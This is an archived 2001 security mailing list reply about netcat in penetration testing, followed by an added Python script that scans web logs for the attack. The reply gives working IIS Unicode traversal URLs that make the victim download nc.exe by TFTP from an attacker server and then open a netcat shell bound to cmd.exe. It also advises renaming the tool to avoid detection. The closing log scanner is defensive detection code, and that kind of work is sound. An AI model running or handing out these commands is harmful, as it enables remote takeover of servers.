Re: Ideas on netcat

From: Assess (assessat_private)
Date: Mon Aug 27 2001 - 15:01:35 PDT


    This is a simple way to take over an IIS web server without the Unicode
    patch. It requires that the firewall has TFTP outbound active and an
    inbound port available with nothing loaded on it. While several things must
    occur for this to work, I have had it work twice out of ten assessments, so
    the odds may still be good. You may want to rename nc.exe to something less
    obvious.
    
    Get Netcat from your tftp server
    
    http://VICTIMADDRESSHERE/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp.exe+-i+TFTPSERVERADDRESSHERE+GET+nc.exe+c:\nc.exe
    
    Start netcat on port 23 or any port that is open inbound, and unused,
    through the firewall. TCP port 53 works more often than not if DNS has been
    configured incorrectly.
    
    http://VICTIMADDRESS/scripts/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+nc%20-l%20-p%2023%20-t%20-e%20cmd.exe
    
    Telnet to the port on the target system. If it works you should have a c:\
    prompt.
    
    ----- Original Message -----
    From: "Vo0d0o" <voodoooat_private>
    To: <pen-testat_private>
    Sent: Friday, August 24, 2001 2:29 AM
    Subject: Ideas on netcat
    
    
    
    To all netcat gurus,
    
    I have been experimenting on netcat for a few days and searching almost
    every day on netcat for some possible uses, but in vain.
    
    As far as I know, no site is giving some other uses of netcat pertaining to
    pen-testing ...other than the usual *README* file which I find too basic.
    
    I would be grateful if anybody could throw some light on uses of netcat in
    pen-testing.
    
    Thanks in advance.
    
    Cheers,
    Kartik.
    
    
    
    
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
    Service. For more information on SecurityFocus' SIA service which
    automatically alerts you to the latest security vulnerabilities please see:
    https://alerts.securityfocus.com/
    
    
    
    



    This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 11:50:18 PDT
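
For the defender's side of the requests quoted in the message above, this added example (not part of the original post or the list archive) percent-decodes each request path repeatedly, the way %255c unfolds to %5c and then to a backslash, and flags traversal and command-interpreter paths. The log lines and their seven-field layout are constructed for illustration; real web server log formats differ.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (date time client method uri-stem query status).
SAMPLE_LOG = """\
2001-08-27 15:01:35 192.0.2.10 GET /scripts/..%255c../..%255c../winnt/system32/cmd.exe /c+ver 200
2001-08-27 15:02:01 192.0.2.11 GET /default.asp - 200
2001-08-27 15:02:44 192.0.2.12 GET /images/logo%20small.gif - 200
2001-08-27 15:03:09 192.0.2.13 GET /scripts/..%5c../winnt/system32/cmd.exe /c+ver 404
"""

SHELL = re.compile(r"\b(cmd|command)\.(exe|com)\b", re.IGNORECASE)


def fully_decode(value, max_rounds=5):
    """Percent-decode until the string stops changing; return (text, rounds)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = unquote(value)
        if decoded == value:
            break
        value, rounds = decoded, rounds + 1
    return value, rounds


def scan(log_text):
    """Return (client, status, reasons) for every suspicious request line."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue  # header/comment or malformed line
        client, stem, status = fields[2], fields[4], fields[6]
        decoded, rounds = fully_decode(stem)
        reasons = []
        if rounds >= 2:  # a path that needed a second decode pass was encoded twice
            reasons.append("multi-encoded")
        if "../" in decoded.replace("\\", "/"):  # treat \ and / alike
            reasons.append("traversal")
        if SHELL.search(decoded):
            reasons.append("shell-binary")
        if reasons:
            hits.append((client, status, reasons))
    return hits


if __name__ == "__main__":
    for client, status, reasons in scan(SAMPLE_LOG):
        print(client, status, ",".join(reasons))
```

A hit with status 200 deserves first attention, since the server answered the request rather than rejecting it.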